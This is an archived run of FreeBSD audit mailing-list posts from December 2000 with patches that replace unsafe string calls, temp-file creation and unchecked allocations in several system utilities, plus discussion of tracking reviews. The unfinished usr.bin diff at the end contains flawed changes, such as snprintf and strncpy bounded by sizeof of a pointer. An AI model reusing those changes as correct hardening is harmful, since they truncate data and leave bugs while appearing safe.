From owner-freebsd-audit Sun Dec 3 4:24:59 2000 Delivered-To: freebsd-audit@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id BFC5D37B6A2 for ; Sun, 3 Dec 2000 04:24:45 -0800 (PST) Received: from earth.causticlabs.com (oca-c1s1-07.mfi.net [209.26.94.8]) by peitho.fxp.org (Postfix) with ESMTP id 8A6F813611 for ; Sun, 3 Dec 2000 07:24:48 -0500 (EST) Received: by earth.causticlabs.com (Postfix, from userid 1000) id 54CD91F23; Sun, 3 Dec 2000 07:25:12 -0500 (EST) Date: Sun, 3 Dec 2000 07:25:12 -0500 From: Chris Faulhaber To: freebsd-audit@FreeBSD.org Subject: crunchgen(8) patch (again) Message-ID: <20001203072512.A86744@earth.causticlabs.com> Mail-Followup-To: Chris Faulhaber , freebsd-audit@FreeBSD.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG The following patch fixes: o check strdup() return values o strcpy() -> strlcpy() o sprintf() -> snprintf() o mktemp() -> mkstemp() o use err() instead of errx() in out_of_memory() function since errno will probably be set Also, I have quite a few small patches for review at: http://www.fxp.org/~jedgar/FreeBSD/diffs/ -- Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org Index: crunchgen.c =================================================================== RCS file: /home/ncvs/src/usr.sbin/crunch/crunchgen/crunchgen.c,v retrieving revision 1.17 diff -u -r1.17 crunchgen.c --- crunchgen.c 2000/11/30 21:14:54 1.17 +++ crunchgen.c 2000/12/01 13:48:30 @@ -124,7 +124,8 @@ if (p == NULL || *p == '\0') objprefix = "/usr/obj"; /* default */ else - objprefix = strdup(p); + if ((objprefix = strdup(p)) == NULL) + out_of_memory(); while((optc = getopt(argc, argv, "lh:m:c:e:p:foq")) != -1) { switch(optc) { @@ -132,11 +133,13 @@ case 'o': makeobj = 1; break; case 'q': verbose = 0; break; - case 'm': strcpy(outmkname, optarg); break; - case 'p': objprefix = strdup(optarg); break; - case 'h': strcpy(outhdrname, optarg); break; - case 'c': strcpy(outcfname, optarg); break; - case 'e': strcpy(execfname, optarg); break; + case 'm': strlcpy(outmkname, optarg, sizeof(outmkname)); break; + case 'p': if ((objprefix = strdup(optarg)) == NULL) + out_of_memory(); + break; + case 'h': strlcpy(outhdrname, optarg, sizeof(outhdrname)); break; + case 'c': strlcpy(outcfname, optarg, sizeof(outcfname)); break; + case 'e': strlcpy(execfname, optarg, sizeof(execfname)); break; case 'l': list_mode++; verbose = 0; break; case '?': @@ -153,24 +156,21 @@ * generate filenames */ - strcpy(infilename, argv[0]); + strlcpy(infilename, argv[0], sizeof(infilename)); /* confname = `basename infilename .conf` */ - if((p=strrchr(infilename, '/')) != NULL) strcpy(confname, p+1); - else strcpy(confname, infilename); + if((p=strrchr(infilename, '/')) != NULL) + strlcpy(confname, p+1, sizeof(confname)); + else strlcpy(confname, infilename, sizeof(confname)); if((p=strrchr(confname, '.')) != NULL && !strcmp(p, ".conf")) *p = '\0'; - if(!*outmkname) sprintf(outmkname, "%s.mk", confname); - if(!*outcfname) sprintf(outcfname, "%s.c", confname); - if(!*execfname) sprintf(execfname, "%s", confname); + if(!*outmkname) snprintf(outmkname, sizeof(outmkname), "%s.mk", confname); + if(!*outcfname) snprintf(outcfname, sizeof(outcfname), "%s.c", confname); + if(!*execfname) snprintf(execfname, sizeof(execfname), "%s", confname); snprintf(cachename, sizeof(cachename), "%s.cache", confname); snprintf(tempfname, sizeof(tempfname), ".tmp_%sXXXXXX", confname); - if(mktemp(tempfname) == NULL) { - perror(tempfname); - exit(1); - } parse_conf_file(); if (list_mode) @@ -232,9 +232,9 @@ FILE *cf; char line[MAXLINELEN]; - sprintf(line, "reading %s", filename); + snprintf(line, sizeof(line), "reading %s", filename); status(line); - strcpy(curfilename, filename); + strlcpy(curfilename, filename, sizeof(curfilename)); if((cf = fopen(curfilename, "r")) == NULL) { warn("%s", curfilename); @@ -526,7 +526,8 @@ if(srcparent) snprintf(line, MAXLINELEN, "%s/%s", srcparent, p->name); if(is_dir(line)) - p->srcdir = strdup(line); + if ((p->srcdir = strdup(line)) == NULL) + out_of_memory(); } if(!p->objdir && p->srcdir) { FILE *f; @@ -539,7 +540,8 @@ fgets(path,sizeof path, f); if (!pclose(f)) { if(is_dir(path)) - p->objdir = strdup(path); + if ((p->objdir = strdup(path)) == NULL) + out_of_memory(); } } } @@ -579,7 +581,7 @@ void fillin_program_objs(prog_t *p, char *path) { char *obj, *cp; - int rc; + int fd, rc; FILE *f; char *objvar="OBJS"; strlst_t *s; @@ -587,7 +589,11 @@ /* discover the objs from the srcdir Makefile */ - if((f = fopen(tempfname, "w")) == NULL) { + if((fd = mkstemp(tempfname)) == -1) { + perror(tempfname); + exit(1); + } + if((f = fdopen(fd, "w")) == NULL) { warn("%s", tempfname); goterror = 1; return; @@ -928,7 +934,7 @@ void out_of_memory(void) { - errx(1, "%s: %d: out of memory, stopping", infilename, linenum); + err(1, "%s: %d: out of memory, stopping", infilename, linenum); } To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Sun Dec 3 22:48:38 2000 From owner-freebsd-audit@FreeBSD.ORG Sun Dec 3 22:48:36 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from lennier.cc.vt.edu (lennier.cc.vt.edu [198.82.161.193]) by hub.freebsd.org (Postfix) with ESMTP id 3046337B401 for ; Sun, 3 Dec 2000 22:48:35 -0800 (PST) Received: from mail.vt.edu (gkar.cc.vt.edu [198.82.161.190]) by lennier.cc.vt.edu (8.11.0/8.11.0) with ESMTP id eB46mYB520822 for ; Mon, 4 Dec 2000 01:48:34 -0500 (EST) Received: from muriel.penguinpowered.com ([198.82.100.195]) by gkar.cc.vt.edu (Sun Internet Mail Server sims.3.5.2000.03.23.18.03.p10) with ESMTP id <0G51003H66WW8G@gkar.cc.vt.edu> for FreeBSD-audit@freebsd.org; Mon, 4 Dec 2000 01:48:32 -0500 (EST) Date: Mon, 04 Dec 2000 01:48:35 -0500 (EST) From: Mike Heffner Subject: cursor patch Sender: spock@muriel.penguinpowered.com To: FreeBSD-audit Message-id: MIME-version: 1.0 X-Mailer: XFMail 1.4.4 on FreeBSD Content-type: text/plain; charset=us-ascii Content-transfer-encoding: 8bit X-Priority: 3 (Normal) Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG This fixes the overflow on the -d option of cursor(1). Index: cursor.c =================================================================== RCS file: /home/ncvs/src/usr.sbin/pcvt/cursor/cursor.c,v retrieving revision 1.7 diff -u -r1.7 cursor.c --- cursor.c 1999/01/01 08:31:55 1.7 +++ cursor.c 2000/12/04 06:44:15 @@ -45,6 +45,7 @@ *---------------------------------------------------------------------------*/ #include +#include #include #include #include @@ -104,29 +105,15 @@ fd = DEFAULTFD; } else - { if((fd = open(device, O_RDWR)) == -1) - { - char buffer[80]; - strcpy(buffer,"ERROR opening "); - strcat(buffer,device); - perror(buffer); - exit(1); - } - } + err(1, "ERROR opening %s", device); if(screen == -1) { struct stat stat; if((fstat(fd, &stat)) == -1) - { - char buffer[80]; - strcpy(buffer,"ERROR opening "); - strcat(buffer,device); - perror(buffer); - exit(1); - } + err(1, "ERROR opening %s", device); screen = minor(stat.st_rdev); } @@ -136,10 +123,7 @@ cursorshape.screen_no = screen; if(ioctl(fd, VGACURSOR, &cursorshape) == -1) - { - perror("cursor - ioctl VGACURSOR failed, error"); - exit(1); - } + err(1, "cursor - ioctl VGACURSOR failed, error"); else exit(0); } -- Mike Heffner Blacksburg, VA ICQ# 882073 http://my.ispchannel.com/~mheffner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Mon Dec 4 3:58:38 2000 From owner-freebsd-audit@FreeBSD.ORG Mon Dec 4 03:58:30 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id 485A337B401 for ; Mon, 4 Dec 2000 03:58:29 -0800 (PST) Received: from earth.causticlabs.com (oca-c1s1-23.mfi.net [209.26.94.24]) by peitho.fxp.org (Postfix) with ESMTP id 1A7A51360E for ; Mon, 4 Dec 2000 06:58:30 -0500 (EST) Received: by earth.causticlabs.com (Postfix, from userid 1000) id C522C1F23; Mon, 4 Dec 2000 06:58:53 -0500 (EST) Date: Mon, 4 Dec 2000 06:58:53 -0500 From: Chris Faulhaber To: freebsd-audit@FreeBSD.org Subject: config(8) patch (again) Message-ID: <20001204065853.A8036@earth.causticlabs.com> Mail-Followup-To: Chris Faulhaber , freebsd-audit@FreeBSD.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: jedgar@earth.causticlabs.com Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG See below for a patch to config to properly check the return values of malloc(), strdup(), and asprintf() calls. The ns() define (#define ns(s) strdup(s)) has been converted to a 'safe' strdup function, resulting in fewer actual line changes. Also, I have quite a few small patches for review at: http://www.fxp.org/~jedgar/FreeBSD/diffs/ -- Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org Index: config.h =================================================================== RCS file: /home/ncvs/src/usr.sbin/config/config.h,v retrieving revision 1.39 diff -u -r1.39 config.h --- config.h 2000/09/29 13:30:24 1.39 +++ config.h 2000/12/01 19:41:41 @@ -145,6 +145,7 @@ void options(void); void makefile(void); void headers(void); +char *ns(const char *); extern struct device *dtab; @@ -162,4 +163,3 @@ extern char srcdir[]; /* root of the kernel source tree */ #define eq(a,b) (!strcmp(a,b)) -#define ns(s) strdup(s) Index: config.y =================================================================== RCS file: /home/ncvs/src/usr.sbin/config/config.y,v retrieving revision 1.46 diff -u -r1.46 config.y --- config.y 2000/10/14 08:33:19 1.46 +++ config.y 2000/12/01 19:41:41 @@ -82,8 +82,6 @@ char errbuf[80]; int maxusers; -#define ns(s) strdup(s) - static void yyerror(char *s); @@ -131,6 +129,8 @@ = { struct cputype *cp = (struct cputype *)malloc(sizeof (struct cputype)); + if (!cp) + err(1, "out of memory"); memset(cp, 0, sizeof(*cp)); cp->cpu_name = $2; cp->cpu_next = cputype; @@ -165,6 +165,8 @@ Save_id = { struct opt *op = (struct opt *)malloc(sizeof (struct opt)); + if (!op) + err(1, "out of memory"); memset(op, 0, sizeof(*op)); op->op_name = ns("KERNEL"); op->op_ownfile = 0; @@ -190,6 +192,8 @@ = { struct opt *op = (struct opt *)malloc(sizeof (struct opt)); char *s; + if (!op) + err(1, "out of memory"); memset(op, 0, sizeof(*op)); op->op_name = $1; op->op_next = opt; @@ -209,6 +213,8 @@ Save_id EQUALS Opt_value = { struct opt *op = (struct opt *)malloc(sizeof (struct opt)); + if (!op) + err(1, "out of memory"); memset(op, 0, sizeof(*op)); op->op_name = $1; op->op_next = opt; @@ -243,6 +249,8 @@ Save_id EQUALS Opt_value = { struct opt *op = (struct opt *)malloc(sizeof (struct opt)); + if (!op) + err(1, "out of memory"); memset(op, 0, sizeof(*op)); op->op_name = $1; op->op_ownfile = 0; /* for now */ @@ -291,6 +299,8 @@ struct device *np; np = (struct device *) malloc(sizeof *np); + if (!np) + err(1, "out of memory"); memset(np, 0, sizeof(*np)); *np = *dp; np->d_name = dp->d_name; Index: lang.l =================================================================== RCS file: /home/ncvs/src/usr.sbin/config/lang.l,v retrieving revision 1.29 diff -u -r1.29 lang.l --- lang.l 2000/10/14 08:33:19 1.29 +++ lang.l 2000/12/01 19:41:41 @@ -80,7 +80,7 @@ BEGIN 0; if ((i = kw_lookup(yytext)) == -1) { - yylval.str = strdup(yytext); + yylval.str = ns(yytext); return ID; } return i; @@ -96,25 +96,25 @@ } {ID} { BEGIN 0; - yylval.str = strdup(yytext); + yylval.str = ns(yytext); return ID; } \\\"[^"]+\\\" { BEGIN 0; yytext[yyleng-2] = '"'; yytext[yyleng-1] = '\0'; - yylval.str = strdup(yytext + 1); + yylval.str = ns(yytext + 1); return ID; } \"[^"]+\" { BEGIN 0; yytext[yyleng-1] = '\0'; - yylval.str = strdup(yytext + 1); + yylval.str = ns(yytext + 1); return ID; } [^# \t\n]* { BEGIN 0; - yylval.str = strdup(yytext); + yylval.str = ns(yytext); return ID; } 0[0-7]* { Index: main.c =================================================================== RCS file: /home/ncvs/src/usr.sbin/config/main.c,v retrieving revision 1.41 diff -u -r1.41 main.c --- main.c 2000/11/21 19:58:55 1.41 +++ main.c 2000/12/01 19:41:42 @@ -345,10 +345,13 @@ { char *cp = NULL; - if (file) + if (file) { asprintf(&cp, "%s/%s", destdir, file); - else - cp = strdup(destdir); + if (cp == NULL) + err(1, "out of memory"); + } else { + cp = ns(destdir); + } return (cp); } @@ -442,4 +445,14 @@ if (unlink(from_name) < 0) err(EX_OSERR, "unlink(%s)", from_name); } +} + +char * +ns(const char *s) +{ + char *retval; + + if ((retval = strdup(s)) == NULL) + err(1, "out of memory"); + return retval; } Index: mkheaders.c =================================================================== RCS file: /home/ncvs/src/usr.sbin/config/mkheaders.c,v retrieving revision 1.17 diff -u -r1.17 mkheaders.c --- mkheaders.c 2000/11/21 19:58:55 1.17 +++ mkheaders.c 2000/12/01 19:41:42 @@ -148,6 +148,8 @@ if (cp == (char *)EOF) break; fl = (struct file_list *) malloc(sizeof *fl); + if (!fl) + err(1, "out of memory"); bzero(fl, sizeof(*fl)); fl->f_fn = inw; /* malloced */ fl->f_type = inc; @@ -165,6 +167,8 @@ } if (oldcount == -1) { fl = (struct file_list *) malloc(sizeof *fl); + if (!fl) + err(1, "out of memory"); bzero(fl, sizeof(*fl)); fl->f_fn = ns(name); fl->f_type = count; Index: mkmakefile.c =================================================================== RCS file: /home/ncvs/src/usr.sbin/config/mkmakefile.c,v retrieving revision 1.57 diff -u -r1.57 mkmakefile.c --- mkmakefile.c 2000/11/25 03:25:34 1.57 +++ mkmakefile.c 2000/12/01 19:41:42 @@ -119,6 +119,8 @@ struct file_list *fp; fp = (struct file_list *) malloc(sizeof *fp); + if (!fp) + err(1, "out of memory"); bzero(fp, sizeof *fp); if (fcur == 0) fcur = ftab = fp; @@ -492,6 +494,8 @@ } if (std) { dp = (struct device *) malloc(sizeof *dp); + if (!dp) + err(1, "out of memory"); bzero(dp, sizeof *dp); dp->d_type = DEVICE; dp->d_name = ns(wd); Index: mkoptions.c =================================================================== RCS file: /home/ncvs/src/usr.sbin/config/mkoptions.c,v retrieving revision 1.21 diff -u -r1.21 mkoptions.c --- mkoptions.c 2000/11/21 19:58:55 1.21 +++ mkoptions.c 2000/12/01 19:41:42 @@ -81,6 +81,8 @@ /* Fake the cpu types as options. */ for (cp = cputype; cp != NULL; cp = cp->cpu_next) { op = (struct opt *)malloc(sizeof(*op)); + if (!op) + err(1, "out of memory"); memset(op, 0, sizeof(*op)); op->op_name = ns(cp->cpu_name); op->op_next = opt; @@ -104,6 +106,8 @@ /* Fake MAXUSERS as an option. */ op = (struct opt *)malloc(sizeof(*op)); + if (!op) + err(1, "out of memory"); memset(op, 0, sizeof(*op)); op->op_name = "MAXUSERS"; snprintf(buf, sizeof(buf), "%d", maxusers); @@ -218,6 +222,8 @@ tidy++; } else { op = (struct opt *) malloc(sizeof *op); + if (!op) + err(1, "out of memory"); bzero(op, sizeof(*op)); op->op_name = inw; op->op_value = invalue; @@ -245,6 +251,8 @@ if (value && !seen) { /* New option appears */ op = (struct opt *) malloc(sizeof *op); + if (!op) + err(1, "out of memory"); bzero(op, sizeof(*op)); op->op_name = ns(name); op->op_value = value ? ns(value) : NULL; @@ -368,6 +376,8 @@ } po = (struct opt_list *) malloc(sizeof *po); + if (!po) + err(1, "out of memory"); bzero(po, sizeof(*po)); po->o_name = this; po->o_file = val; To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Mon Dec 4 5:56: 5 2000 From owner-freebsd-audit@FreeBSD.ORG Mon Dec 4 05:56:04 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id EE9BF37B401 for ; Mon, 4 Dec 2000 05:56:03 -0800 (PST) Received: from earth.causticlabs.com (oca-c1s2-04.mfi.net [209.26.94.51]) by peitho.fxp.org (Postfix) with ESMTP id 1A95F13611; Mon, 4 Dec 2000 08:56:01 -0500 (EST) Received: by earth.causticlabs.com (Postfix, from userid 1000) id 893B91F23; Mon, 4 Dec 2000 08:56:29 -0500 (EST) Date: Mon, 4 Dec 2000 08:56:29 -0500 From: Chris Faulhaber To: Mike Heffner Cc: FreeBSD-audit Subject: Re: cursor patch Message-ID: <20001204085629.A8164@earth.causticlabs.com> Mail-Followup-To: Chris Faulhaber , Mike Heffner , FreeBSD-audit References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from mheffner@vt.edu on Mon, Dec 04, 2000 at 01:48:35AM -0500 Sender: jedgar@earth.causticlabs.com Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG On Mon, Dec 04, 2000 at 01:48:35AM -0500, Mike Heffner wrote: > This fixes the overflow on the -d option of cursor(1). > Looks good here. Additionally, it appears ispcvt, loadfont, scon (and potentially userkeys), all in src/usr.sbin/pcvt, have similiar problems. -- Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Mon Dec 4 7:52:11 2000 From owner-freebsd-audit@FreeBSD.ORG Mon Dec 4 07:52:09 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from lennier.cc.vt.edu (lennier.cc.vt.edu [198.82.161.193]) by hub.freebsd.org (Postfix) with ESMTP id 3563837B400 for ; Mon, 4 Dec 2000 07:52:09 -0800 (PST) Received: from mail.vt.edu (gkar.cc.vt.edu [198.82.161.190]) by lennier.cc.vt.edu (8.11.0/8.11.0) with ESMTP id eB4Fq7B45422; Mon, 4 Dec 2000 10:52:07 -0500 (EST) Received: from muriel.penguinpowered.com ([198.82.100.195]) by gkar.cc.vt.edu (Sun Internet Mail Server sims.3.5.2000.03.23.18.03.p10) with ESMTP id <0G5100ILIW2UCO@gkar.cc.vt.edu>; Mon, 4 Dec 2000 10:52:06 -0500 (EST) Date: Mon, 04 Dec 2000 10:52:06 -0500 (EST) From: Mike Heffner Subject: Re: cursor patch In-reply-to: <20001204085629.A8164@earth.causticlabs.com> Sender: spock@muriel.penguinpowered.com To: Chris Faulhaber Cc: FreeBSD-audit Message-id: MIME-version: 1.0 X-Mailer: XFMail 1.4.4 on FreeBSD Content-type: text/plain; charset=us-ascii Content-transfer-encoding: 8bit X-Priority: 3 (Normal) Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG I'll look into those this week. On 04-Dec-2000 Chris Faulhaber wrote: | On Mon, Dec 04, 2000 at 01:48:35AM -0500, Mike Heffner wrote: | > This fixes the overflow on the -d option of cursor(1). | > | | Looks good here. Additionally, it appears ispcvt, loadfont, | scon (and potentially userkeys), all in src/usr.sbin/pcvt, | have similiar problems. | -- Mike Heffner Blacksburg, VA ICQ# 882073 http://my.ispchannel.com/~mheffner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Mon Dec 4 12: 9:17 2000 From owner-freebsd-audit@FreeBSD.ORG Mon Dec 4 12:09:15 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.66]) by hub.freebsd.org (Postfix) with ESMTP id 814E437B400 for ; Mon, 4 Dec 2000 12:09:13 -0800 (PST) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id eB4K9CQ93031 for ; Mon, 4 Dec 2000 13:09:12 -0700 (MST) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id NAA63339 for ; Mon, 4 Dec 2000 13:09:12 -0700 (MST) Message-Id: <200012042009.NAA63339@harmony.village.org> To: audit@freebsd.org Subject: PR suggestion Date: Mon, 04 Dec 2000 13:09:12 -0700 From: Warner Losh Sender: imp@harmony.village.org Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG I'd love to see this group become more active. What I've been seeing recently pleases me greatly. More and more people posting to this list. I like that. I fear that we're going to start dropping these things on the floor. I'd like to propose that we use the PR system to our advantage. We should assign pending patch reviews to audit@freebsd.org. when things are fixed, we'd get mail. We'd get a weekly summary of the open issues and some of the discussions about the patches would be recorded in the PR. Comments? Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Mon Dec 4 13:29:44 2000 From owner-freebsd-audit@FreeBSD.ORG Mon Dec 4 13:29:41 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from lennier.cc.vt.edu (lennier.cc.vt.edu [198.82.161.193]) by hub.freebsd.org (Postfix) with ESMTP id C3CCC37B401 for ; Mon, 4 Dec 2000 13:29:40 -0800 (PST) Received: from mail.vt.edu (gkar.cc.vt.edu [198.82.161.190]) by lennier.cc.vt.edu (8.11.0/8.11.0) with ESMTP id eB4LTdB122679; Mon, 4 Dec 2000 16:29:39 -0500 (EST) Received: from muriel.penguinpowered.com ([198.82.100.195]) by gkar.cc.vt.edu (Sun Internet Mail Server sims.3.5.2000.03.23.18.03.p10) with ESMTP id <0G5200671BPE6N@gkar.cc.vt.edu>; Mon, 4 Dec 2000 16:29:38 -0500 (EST) Date: Mon, 04 Dec 2000 16:29:38 -0500 (EST) From: Mike Heffner Subject: RE: PR suggestion In-reply-to: <200012042009.NAA63339@harmony.village.org> Sender: spock@muriel.penguinpowered.com To: Warner Losh Cc: audit@freebsd.org Message-id: MIME-version: 1.0 X-Mailer: XFMail 1.4.4 on FreeBSD Content-type: text/plain; charset=us-ascii Content-transfer-encoding: 8bit X-Priority: 3 (Normal) Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG I'm all for it. Hopefully it'll mean more follow through on patches. Should there be a new category added, for example "audit"? On 04-Dec-2000 Warner Losh wrote: | | I'd love to see this group become more active. What I've been seeing | recently pleases me greatly. More and more people posting to this | list. I like that. | | I fear that we're going to start dropping these things on the floor. | I'd like to propose that we use the PR system to our advantage. We | should assign pending patch reviews to audit@freebsd.org. when things | are fixed, we'd get mail. We'd get a weekly summary of the open | issues and some of the discussions about the patches would be recorded | in the PR. | | Comments? | -- Mike Heffner Blacksburg, VA ICQ# 882073 http://my.ispchannel.com/~mheffner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Mon Dec 4 17:11:34 2000 From owner-freebsd-audit@FreeBSD.ORG Mon Dec 4 17:11:06 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from puck.firepipe.net (mcut-b-167.resnet.purdue.edu [128.211.209.167]) by hub.freebsd.org (Postfix) with ESMTP id 6A88037B400 for ; Mon, 4 Dec 2000 17:11:02 -0800 (PST) Received: by puck.firepipe.net (Postfix, from userid 1000) id 20AE718C5; Mon, 4 Dec 2000 20:10:58 -0500 (EST) Date: Mon, 4 Dec 2000 20:10:58 -0500 From: Will Andrews To: audit@FreeBSD.org Subject: usr.bin audit patch Message-ID: <20001204201058.W570@puck.firepipe.net> Reply-To: Will Andrews Mail-Followup-To: Will Andrews , audit@FreeBSD.org Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="9jxsPFA5p3P2qPhR" Content-Disposition: inline User-Agent: Mutt/1.2.5i X-Operating-System: FreeBSD 4.1-STABLE i386 Sender: will@puck.firepipe.net Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG --9jxsPFA5p3P2qPhR Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Hi guys, This is a bit of auditing I did on usr.bin (about half of it anyway). There's probably a lot of false positives here. Sorry for being a lame auditer. Feel free to enlighten me. :-) -- wca --9jxsPFA5p3P2qPhR Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename="usrbin.diff" Index: apply/apply.c =================================================================== RCS file: /cvs/FreeBSD/src/usr.bin/apply/apply.c,v retrieving revision 1.10 diff -u -r1.10 apply.c --- apply/apply.c 2000/10/16 08:11:48 1.10 +++ apply/apply.c 2000/12/05 01:00:48 @@ -124,9 +124,9 @@ nargs = 1; p = cmd; - p += sprintf(cmd, "exec %s", argv[0]); + p += snprintf(cmd, sizeof(cmd), "exec %s", argv[0]); for (i = 1; i <= nargs; i++) - p += sprintf(p, " %c%d", magic, i); + p += snprintf(p, sizeof(p), " %c%d", magic, i); /* * If nargs set to the special value 0, eat a single @@ -135,7 +135,7 @@ if (nargs == 0) nargs = 1; } else { - (void)sprintf(cmd, "exec %s", argv[0]); + (void)snprintf(cmd, sizeof(cmd), "exec %s", argv[0]); nargs = n; } @@ -165,7 +165,8 @@ /* Expand command argv references. */ for (p = cmd, q = c; *p != '\0'; ++p) if (p[0] == magic && isdigit(p[1]) && p[1] != '0') - q += sprintf(q, "%s", argv[(++p)[0] - '0']); + q += snprintf(q, sizeof(q), "%s", + argv[(++p)[0] - '0']); else *q++ = *p; Index: ar/misc.c =================================================================== RCS file: /cvs/FreeBSD/src/usr.bin/ar/misc.c,v retrieving revision 1.6 diff -u -r1.6 misc.c --- ar/misc.c 1998/12/06 07:36:44 1.6 +++ ar/misc.c 2000/12/05 01:00:48 @@ -70,9 +70,9 @@ } if (envtmp) - (void)sprintf(path, "%s/%s", envtmp, _NAME_ARTMP); + snprintf(path, sizeof(path), "%s/%s", envtmp, _NAME_ARTMP); else - strcpy(path, _PATH_ARTMP); + strncpy(path, _PATH_ARTMP, sizeof(path)); sigfillset(&set); (void)sigprocmask(SIG_BLOCK, &set, &oset); Index: chat/chat.c =================================================================== RCS file: /cvs/FreeBSD/src/usr.bin/chat/chat.c,v retrieving revision 1.15 diff -u -r1.15 chat.c --- chat/chat.c 1999/11/25 07:28:54 1.15 +++ chat/chat.c 2000/12/05 01:00:48 @@ -951,11 +951,11 @@ c &= 0x7F; if (c < 32) - sprintf(string, "%s^%c", meta, (int)c + '@'); + snprintf(string, sizeof(string), "%s^%c", meta, (int)c + '@'); else if (c == 127) - sprintf(string, "%s^?", meta); + snprintf(string, sizeof(string), "%s^?", meta); else - sprintf(string, "%s%c", meta, c); + snprintf(string, sizeof(string), "%s%c", meta, c); return (string); } Index: chkey/chkey.c =================================================================== RCS file: /cvs/FreeBSD/src/usr.bin/chkey/chkey.c,v retrieving revision 1.1.1.1 diff -u -r1.1.1.1 chkey.c --- chkey/chkey.c 1997/05/28 15:54:04 1.1.1.1 +++ chkey/chkey.c 2000/12/05 01:00:48 @@ -247,7 +247,7 @@ { char pkent[1024]; - (void)sprintf(pkent,"%s:%s", public, secret); + (void)snprintf(pkent, sizeof(pkent), "%s:%s", public, secret); #ifdef YP return (yp_update(domain, PKMAP, YPOP_STORE, name, strlen(name), pkent, strlen(pkent))); @@ -268,7 +268,7 @@ static struct passwd pw; char *p; - (void)sprintf(uidstr, "%d", uid); + snprintf(uidstr, sizeof(uidstr), "%d", uid); if (yp_match(domain, "passwd.byuid", uidstr, strlen(uidstr), &val, &vallen) != 0) { return (NULL); Index: chpass/edit.c =================================================================== RCS file: /cvs/FreeBSD/src/usr.bin/chpass/edit.c,v retrieving revision 1.18 diff -u -r1.18 edit.c --- chpass/edit.c 2000/09/06 18:16:46 1.18 +++ chpass/edit.c 2000/12/05 01:00:48 @@ -247,9 +247,9 @@ strlen(list[E_OTHER].save) + 5; if (!(p = malloc(len))) err(1, NULL); - (void)sprintf(pw->pw_gecos = p, "%s,%s,%s,%s,%s", list[E_NAME].save, - list[E_LOCATE].save, list[E_BPHONE].save, list[E_HPHONE].save, - list[E_OTHER].save); + (void)snprintf(pw->pw_gecos = p, sizeof(p), "%s,%s,%s,%s,%s", + list[E_NAME].save, list[E_LOCATE].save, list[E_BPHONE].save, + list[E_HPHONE].save, list[E_OTHER].save); while ((len = strlen(pw->pw_gecos)) && pw->pw_gecos[len - 1] == ',') pw->pw_gecos[len - 1] = '\0'; Index: doscmd/ParseBuffer.c =================================================================== RCS file: /cvs/FreeBSD/src/usr.bin/doscmd/ParseBuffer.c,v retrieving revision 1.2 diff -u -r1.2 ParseBuffer.c --- doscmd/ParseBuffer.c 1999/08/28 01:00:03 1.2 +++ doscmd/ParseBuffer.c 2000/12/05 01:00:48 @@ -58,7 +58,7 @@ _buf = malloc(buflen); } buf = _buf; - strcpy(buf, obuf); + strncpy(buf, obuf, sizeof(buf)); a = av; e = &av[mac]; Index: doscmd/debug.c =================================================================== RCS file: /cvs/FreeBSD/src/usr.bin/doscmd/debug.c,v retrieving revision 1.3 diff -u -r1.3 debug.c --- doscmd/debug.c 1999/09/29 20:09:17 1.3 +++ doscmd/debug.c 2000/12/05 01:00:48 @@ -112,7 +112,7 @@ 